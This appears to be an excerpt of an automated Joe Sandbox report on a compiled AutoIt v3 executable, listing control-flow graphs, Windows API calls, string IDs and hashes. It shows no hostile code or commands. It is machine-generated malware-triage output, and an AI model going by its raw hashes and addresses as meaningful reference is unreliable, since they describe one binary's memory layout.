                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-2659433951
                                                                            • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                            • Instruction ID: 699c6ffc9ad3b939ddf8a0b3f8ee8e0570b0d9b1b3e781579784bdf2bc8dacca
                                                                            • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                            • Instruction Fuzzy Hash: 2D311832A04B029AE720EF70E8447A97BB4FB44798F904139CA5D17B64DF7CD16ACB90

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 189 7ff79784e958-7ff79784e9ae 190 7ff7978927e4-7ff7978927ea DestroyWindow 189->190 191 7ff79784e9b4-7ff79784e9d3 mciSendStringW 189->191 194 7ff7978927f0-7ff797892801 190->194 192 7ff79784ecbd-7ff79784ecce 191->192 193 7ff79784e9d9-7ff79784e9e3 191->193 196 7ff79784ecf7-7ff79784ed01 192->196 197 7ff79784ecd0-7ff79784ecf0 UnregisterHotKey 192->197 193->194 195 7ff79784e9e9 193->195 199 7ff797892803-7ff797892806 194->199 200 7ff797892835-7ff79789283f 194->200 198 7ff79784e9f0-7ff79784e9f3 195->198 196->193 202 7ff79784ed07 196->202 197->196 201 7ff79784ecf2 call 7ff79784f270 197->201 204 7ff79784e9f9-7ff79784ea08 call 7ff797833aa8 198->204 205 7ff79784ecb0-7ff79784ecb8 call 7ff797835410 198->205 206 7ff797892813-7ff797892817 FindClose 199->206 207 7ff797892808-7ff797892811 call 7ff797838314 199->207 200->194 203 7ff797892841 200->203 201->196 202->192 213 7ff797892846-7ff79789284f call 7ff7978c8c00 203->213 219 7ff79784ea0f-7ff79784ea12 204->219 205->198 212 7ff79789281d-7ff79789282e 206->212 207->212 212->200 217 7ff797892830 call 7ff7978b3180 212->217 213->219 217->200 219->213 222 7ff79784ea18 219->222 223 7ff79784ea1f-7ff79784ea22 222->223 224 7ff797892854-7ff79789285d call 7ff7978a46cc 223->224 225 7ff79784ea28-7ff79784ea32 223->225 224->223 227 7ff797892862-7ff797892873 225->227 228 7ff79784ea38-7ff79784ea42 225->228 230 7ff797892875 FreeLibrary 227->230 231 7ff79789287b-7ff797892885 227->231 232 7ff79784ea48-7ff79784ea76 call 7ff7978413e0 228->232 233 7ff79789288c-7ff79789289d 228->233 230->231 231->227 235 7ff797892887 231->235 242 7ff79784ea78 232->242 243 7ff79784eabf-7ff79784eacc OleUninitialize 232->243 236 7ff79789289f-7ff7978928c2 VirtualFree 233->236 237 7ff7978928c9-7ff7978928d3 233->237 235->233 236->237 238 7ff7978928c4 call 7ff7978b321c 236->238 237->233 240 7ff7978928d5 237->240 238->237 245 7ff7978928da-7ff7978928de 240->245 244 7ff79784ea7d-7ff79784eabd call 7ff79784f1c4 call 7ff79784f13c 242->244 243->245 246 7ff79784ead2-7ff79784ead9 243->246 244->243 245->246 248 7ff7978928e4-7ff7978928ef 245->248 249 7ff7978928f4-7ff797892903 call 7ff7978b31d4 246->249 250 7ff79784eadf-7ff79784eaea 246->250 248->246 261 7ff797892905 249->261 253 7ff79784ed09-7ff79784ed18 call 7ff7978542a0 250->253 254 7ff79784eaf0-7ff79784eb22 call 7ff79783a07c call 7ff79784f08c call 7ff7978339bc 250->254 253->254 264 7ff79784ed1e 253->264 273 7ff79784eb2e-7ff79784ebc4 call 7ff7978339bc call 7ff79783a07c call 7ff7978345c8 * 2 call 7ff79783a07c * 3 call 7ff7978413e0 call 7ff79784ee68 call 7ff79784ee2c * 3 254->273 274 7ff79784eb24-7ff79784eb29 call 7ff797854c24 254->274 266 7ff79789290a-7ff797892919 call 7ff7978a3a78 261->266 264->253 272 7ff79789291b 266->272 277 7ff797892920-7ff79789292f call 7ff79784e4e4 272->277 273->266 316 7ff79784ebca-7ff79784ebdc call 7ff7978339bc 273->316 274->273 283 7ff797892931 277->283 286 7ff797892936-7ff797892945 call 7ff7978b3078 283->286 292 7ff797892947 286->292 296 7ff79789294c-7ff79789295b call 7ff7978b31a8 292->296 301 7ff79789295d 296->301 304 7ff797892962-7ff797892971 call 7ff7978b31a8 301->304 310 7ff797892973 304->310 310->310 316->277 319 7ff79784ebe2-7ff79784ebec 316->319 319->286 320 7ff79784ebf2-7ff79784ec08 call 7ff79783a07c 319->320 323 7ff79784ec0e-7ff79784ec18 320->323 324 7ff79784ed20-7ff79784ed25 call 7ff797854c24 320->324 326 7ff79784ec8a-7ff79784eca9 call 7ff79783a07c call 7ff797854c24 323->326 327 7ff79784ec1a-7ff79784ec24 323->327 324->190 337 7ff79784ecab 326->337 327->296 329 7ff79784ec2a-7ff79784ec3b 327->329 329->304 332 7ff79784ec41-7ff79784ed71 call 7ff79783a07c * 3 call 7ff79784ee10 call 7ff79784ed8c 329->332 347 7ff79784ed77-7ff79784ed88 332->347 348 7ff797892978-7ff797892987 call 7ff7978bd794 332->348 337->327 351 7ff797892989 348->351 351->351
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                            • String ID: close all
                                                                            • API String ID: 1992507300-3243417748
                                                                            • Opcode ID: 4c517cb0080db27a8c6d615c682ee036227505625b693fedb5a628ea42d5a717
                                                                            • Instruction ID: 20e4624666eee49a030d5875aba025198ad254a8185d8fac137ef614034b43e2
                                                                            • Opcode Fuzzy Hash: 4c517cb0080db27a8c6d615c682ee036227505625b693fedb5a628ea42d5a717
                                                                            • Instruction Fuzzy Hash: 8AE13022B09A0285EE78FB26C551A7CAB60BF94BC4F944075DB0E57691DF7CE8738720

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                            • String ID: AutoIt v3
                                                                            • API String ID: 423443420-1704141276
                                                                            • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                            • Instruction ID: fdb384b397620e99bea84b8f11a40dc6be48d32112f02acb3326726c88380569
                                                                            • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                            • Instruction Fuzzy Hash: C9313B36A08B028AE760FB61F844768B774FB447A4F854139CD8D17B14DF7DE0568760

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 419 7ff797877348-7ff7978773ba call 7ff797877078 422 7ff7978773bc-7ff7978773c4 call 7ff7978655b4 419->422 423 7ff7978773d3-7ff7978773dd call 7ff79786e418 419->423 428 7ff7978773c7-7ff7978773ce call 7ff7978655d4 422->428 429 7ff7978773f7-7ff797877463 CreateFileW 423->429 430 7ff7978773df-7ff7978773f5 call 7ff7978655b4 call 7ff7978655d4 423->430 443 7ff79787771a-7ff797877736 428->443 431 7ff7978774eb-7ff7978774f6 GetFileType 429->431 432 7ff797877469-7ff797877470 429->432 430->428 438 7ff797877549-7ff79787754f 431->438 439 7ff7978774f8-7ff797877533 GetLastError call 7ff797865564 CloseHandle 431->439 435 7ff7978774b8-7ff7978774e6 GetLastError call 7ff797865564 432->435 436 7ff797877472-7ff797877476 432->436 435->428 436->435 441 7ff797877478-7ff7978774b6 CreateFileW 436->441 446 7ff797877556-7ff797877559 438->446 447 7ff797877551-7ff797877554 438->447 439->428 454 7ff797877539-7ff797877544 call 7ff7978655d4 439->454 441->431 441->435 448 7ff79787755e-7ff7978775ac call 7ff79786e334 446->448 449 7ff79787755b 446->449 447->448 457 7ff7978775ae-7ff7978775ba call 7ff797877284 448->457 458 7ff7978775c0-7ff7978775ea call 7ff797876de4 448->458 449->448 454->428 464 7ff7978775bc 457->464 465 7ff7978775ef-7ff7978775f9 call 7ff7978704b8 457->465 466 7ff7978775fe-7ff797877643 458->466 467 7ff7978775ec 458->467 464->458 465->443 468 7ff797877665-7ff797877671 466->468 469 7ff797877645-7ff797877649 466->469 467->465 472 7ff797877677-7ff79787767b 468->472 473 7ff797877718 468->473 469->468 471 7ff79787764b-7ff797877660 469->471 471->468 472->473 475 7ff797877681-7ff7978776c9 CloseHandle CreateFileW 472->475 473->443 476 7ff7978776fe-7ff797877713 475->476 477 7ff7978776cb-7ff7978776f9 GetLastError call 7ff797865564 call 7ff79786e548 475->477 476->473 477->476
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                            • String ID:
                                                                            • API String ID: 1617910340-0
                                                                            • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                            • Instruction ID: 3fe6130a77031366c77efb174e108f3503a204dd10e71adb4cf6052316e88239
                                                                            • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                            • Instruction Fuzzy Hash: 75C1C232B14A418AEB60EF74D445BAC7BA1EB89BA8F405235DE1E5B7D5CF38D066C310

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 557 7ff7978425bc-7ff79784263d 561 7ff79784287e-7ff7978428af 557->561 562 7ff797842643-7ff79784267c 557->562 563 7ff797842680-7ff797842687 562->563 565 7ff79784268d-7ff7978426a1 563->565 566 7ff797842856-7ff797842876 563->566 568 7ff7978426a7-7ff7978426bc 565->568 569 7ff79788d148-7ff79788d14f 565->569 566->561 570 7ff7978429c8-7ff7978429eb PeekMessageW 568->570 571 7ff7978426c2-7ff7978426c9 568->571 572 7ff79788d155 569->572 573 7ff797842702-7ff797842723 569->573 574 7ff7978426e8-7ff7978426ef 570->574 575 7ff7978429f1-7ff7978429f5 570->575 571->570 576 7ff7978426cf-7ff7978426d4 571->576 583 7ff79788d15a-7ff79788d160 572->583 587 7ff79784276e-7ff7978427d2 573->587 588 7ff797842725-7ff79784272c 573->588 581 7ff79788e285-7ff79788e293 574->581 582 7ff7978426f5-7ff7978426fc 574->582 578 7ff7978429fb-7ff797842a05 575->578 579 7ff79788d1aa-7ff79788d1bb 575->579 576->570 580 7ff7978426da-7ff7978426e2 GetInputState 576->580 578->583 589 7ff797842a0b-7ff797842a1d call 7ff797852de8 578->589 579->574 580->570 580->574 590 7ff79788e29d-7ff79788e2b5 call 7ff79784f1c4 581->590 582->573 582->590 585 7ff79788d162-7ff79788d176 583->585 586 7ff79788d19b 583->586 585->586 591 7ff79788d178-7ff79788d17f 585->591 586->579 628 7ff7978427d8-7ff7978427da 587->628 629 7ff79788e276 587->629 588->587 592 7ff79784272e-7ff797842738 588->592 604 7ff797842a1f-7ff797842a2d TranslateMessage DispatchMessageW 589->604 605 7ff797842a33-7ff797842a4f PeekMessageW 589->605 590->566 591->586 596 7ff79788d181-7ff79788d190 TranslateAcceleratorW 591->596 597 7ff79784273f-7ff797842742 592->597 596->589 601 7ff79788d196 596->601 602 7ff797842748 597->602 603 7ff7978428b0-7ff7978428b7 597->603 601->605 607 7ff79784274f-7ff797842752 602->607 608 7ff7978428b9-7ff7978428cc timeGetTime 603->608 609 7ff7978428eb-7ff7978428ef 603->609 604->605 605->574 610 7ff797842a55 605->610 612 7ff797842758-7ff797842761 607->612 613 7ff7978428f4-7ff7978428fb 607->613 614 7ff7978428d2-7ff7978428d7 608->614 615 7ff79788d2ab-7ff79788d2b0 608->615 609->597 610->575 617 7ff797842767 612->617 618 7ff79788d4c7-7ff79788d4ce 612->618 622 7ff79788d2f8-7ff79788d303 613->622 623 7ff797842901-7ff797842905 613->623 619 7ff7978428d9 614->619 620 7ff7978428dc-7ff7978428e5 614->620 615->620 621 7ff79788d2b6 615->621 617->587 619->620 620->609 627 7ff79788d2bb-7ff79788d2f3 timeGetTime call 7ff797852ac0 call 7ff7978b3a28 620->627 621->627 625 7ff79788d305 622->625 626 7ff79788d309-7ff79788d30c 622->626 623->607 625->626 630 7ff79788d312-7ff79788d319 626->630 631 7ff79788d30e 626->631 627->609 628->629 633 7ff7978427e0-7ff7978427ee 628->633 629->581 635 7ff79788d322-7ff79788d329 630->635 636 7ff79788d31b 630->636 631->630 633->629 634 7ff7978427f4-7ff797842819 633->634 638 7ff79784290a-7ff79784290d 634->638 639 7ff79784281f-7ff797842829 call 7ff797842b70 634->639 640 7ff79788d332-7ff79788d33d call 7ff7978542a0 635->640 641 7ff79788d32b 635->641 636->635 645 7ff797842931-7ff797842933 638->645 646 7ff79784290f-7ff797842915 call 7ff797842e30 638->646 650 7ff79784282e-7ff797842836 639->650 640->602 641->640 648 7ff797842971-7ff797842974 645->648 649 7ff797842935-7ff797842949 call 7ff7978466c0 645->649 653 7ff79784291a 646->653 657 7ff79784297a-7ff79784299c call 7ff7978401a0 648->657 658 7ff79788dfbe-7ff79788dfc0 648->658 659 7ff79784294e-7ff797842950 649->659 655 7ff79784299e-7ff7978429ab 650->655 656 7ff79784283c 650->656 653->650 662 7ff79788e181-7ff79788e197 call 7ff797854c24 * 2 655->662 663 7ff7978429b1-7ff7978429be call 7ff797854c24 655->663 660 7ff797842840-7ff797842843 656->660 657->659 664 7ff79788dfc2-7ff79788dfc5 658->664 665 7ff79788dfed-7ff79788dff6 658->665 659->650 668 7ff797842956-7ff797842966 659->668 669 7ff797842849-7ff797842850 660->669 670 7ff797842b17-7ff797842b1d 660->670 662->629 663->570 664->660 674 7ff79788dfcb-7ff79788dfe7 call 7ff797843c20 664->674 666 7ff79788e005-7ff79788e00c 665->666 667 7ff79788dff8-7ff79788e003 665->667 675 7ff79788e00f-7ff79788e016 call 7ff7978c8b98 666->675 667->675 668->650 676 7ff79784296c 668->676 669->563 669->566 670->669 677 7ff797842b23-7ff797842b2d 670->677 674->665 688 7ff79788e0d7-7ff79788e0d9 675->688 689 7ff79788e01c-7ff79788e036 call 7ff7978b34e4 675->689 682 7ff79788e0f4-7ff79788e10e call 7ff7978b34e4 676->682 677->569 694 7ff79788e110-7ff79788e11d 682->694 695 7ff79788e147-7ff79788e14e 682->695 691 7ff79788e0df-7ff79788e0ee call 7ff7978ca320 688->691 692 7ff79788e0db 688->692 705 7ff79788e06f-7ff79788e076 689->705 706 7ff79788e038-7ff79788e045 689->706 691->682 692->691 696 7ff79788e11f-7ff79788e130 call 7ff797854c24 * 2 694->696 697 7ff79788e135-7ff79788e142 call 7ff797854c24 694->697 695->669 698 7ff79788e154-7ff79788e15a 695->698 696->697 697->695 698->669 703 7ff79788e160-7ff79788e169 698->703 703->662 705->669 708 7ff79788e07c-7ff79788e082 705->708 710 7ff79788e047-7ff79788e058 call 7ff797854c24 * 2 706->710 711 7ff79788e05d-7ff79788e06a call 7ff797854c24 706->711 708->669 714 7ff79788e088-7ff79788e091 708->714 710->711 711->705 714->688
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                            • String ID:
                                                                            • API String ID: 3249950245-0
                                                                            • Opcode ID: a9008c454cb951ee8e911f1e63a45c584e63384c6a3d805aa6474dc0cf70a92d
                                                                            • Instruction ID: 1fcd04e57821c7a3786a050d9e43c966b981e1cb7e9101f74b88aebaa994ddd9
                                                                            • Opcode Fuzzy Hash: a9008c454cb951ee8e911f1e63a45c584e63384c6a3d805aa6474dc0cf70a92d
                                                                            • Instruction Fuzzy Hash: 65229032A0C6828AEB74EB34D441BBDABA0FB45BD4F944136DA5D43695CF7CE462C720

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 849 7ff797833cbc-7ff797833d88 CreateWindowExW * 2 ShowWindow * 2
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$Show
                                                                            • String ID: AutoIt v3$d$edit
                                                                            • API String ID: 2813641753-2600919596
                                                                            • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                            • Instruction ID: 47a5ba42f730ed9b66ae1191137289bc2c3dd952b43f29f9c0e3ba2f42521bab
                                                                            • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                            • Instruction Fuzzy Hash: 25216372A2CB42C6E720EB24F848729B7E1FB487E9F514238D64D46654CFBDD056CB50

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00007FF797852D5C: MapVirtualKeyW.USER32(?,?,?,00007FF797837FA5), ref: 00007FF797852D8E
                                                                              • Part of subcall function 00007FF797852D5C: MapVirtualKeyW.USER32(?,?,?,00007FF797837FA5), ref: 00007FF797852D9C
                                                                              • Part of subcall function 00007FF797852D5C: MapVirtualKeyW.USER32(?,?,?,00007FF797837FA5), ref: 00007FF797852DAC
                                                                              • Part of subcall function 00007FF797852D5C: MapVirtualKeyW.USER32(?,?,?,00007FF797837FA5), ref: 00007FF797852DBC
                                                                              • Part of subcall function 00007FF797852D5C: MapVirtualKeyW.USER32(?,?,?,00007FF797837FA5), ref: 00007FF797852DCA
                                                                              • Part of subcall function 00007FF797852D5C: MapVirtualKeyW.USER32(?,?,?,00007FF797837FA5), ref: 00007FF797852DD8
                                                                              • Part of subcall function 00007FF79784EEC8: RegisterWindowMessageW.USER32 ref: 00007FF79784EF76
                                                                            • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79783106D), ref: 00007FF797838209
                                                                            • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79783106D), ref: 00007FF79783828F
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79783106D), ref: 00007FF79787D36A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                            • String ID: AutoIt
                                                                            • API String ID: 1986988660-2515660138
                                                                            • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                            • Instruction ID: 0004f4478a0c886309f74df8a7d5b77d6adc83b917139a21e1324c2285d79aec
                                                                            • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                            • Instruction Fuzzy Hash: ADC1A561E19B4385E660FB38AC81475FBA8FF943E0F920236D45D42A71DF7CA156C7A0

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                            • String ID: Line:
                                                                            • API String ID: 3135491444-1585850449
                                                                            • Opcode ID: d297a7005dd5db4d80d7ddfa981a4a2ba83f86c4ab3c19e1d6fa449eee743d8e
                                                                            • Instruction ID: 71ba439ae66315840bc3d625d00f1019f17b35709ce7c2db78686ab7aaa163dc
                                                                            • Opcode Fuzzy Hash: d297a7005dd5db4d80d7ddfa981a4a2ba83f86c4ab3c19e1d6fa449eee743d8e
                                                                            • Instruction Fuzzy Hash: FF412162A0C64696EB30FB38D4806F9A761FB843D8FC45031E64D0769AEF7CE556C760
                                                                            APIs
                                                                            • GetOpenFileNameW.COMDLG32 ref: 00007FF79787BAA2
                                                                              • Part of subcall function 00007FF7978356D4: GetFullPathNameW.KERNEL32(?,00007FF7978356C1,?,00007FF797837A0C,?,?,?,00007FF79783109E), ref: 00007FF7978356FF
                                                                              • Part of subcall function 00007FF797833EB4: GetLongPathNameW.KERNELBASE ref: 00007FF797833ED8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                            • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                            • API String ID: 779396738-2360590182
                                                                            • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                            • Instruction ID: b63157f8d28449fed2bbd61cb148fbf2fa81ced0ae22d88a44808ba9b54b3f76
                                                                            • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                            • Instruction Fuzzy Hash: F4316C62608B8289E720EB35E8405A9BBB4FB49BC4F984135DE8C47B55DF3CD556C720
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF797836F52,?,?,?,?,?,?,00007FF79783782C), ref: 00007FF797836FA5
                                                                            • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF797836F52,?,?,?,?,?,?,00007FF79783782C), ref: 00007FF797836FD3
                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF797836F52,?,?,?,?,?,?,00007FF79783782C), ref: 00007FF797836FFA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3677997916-0
                                                                            • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
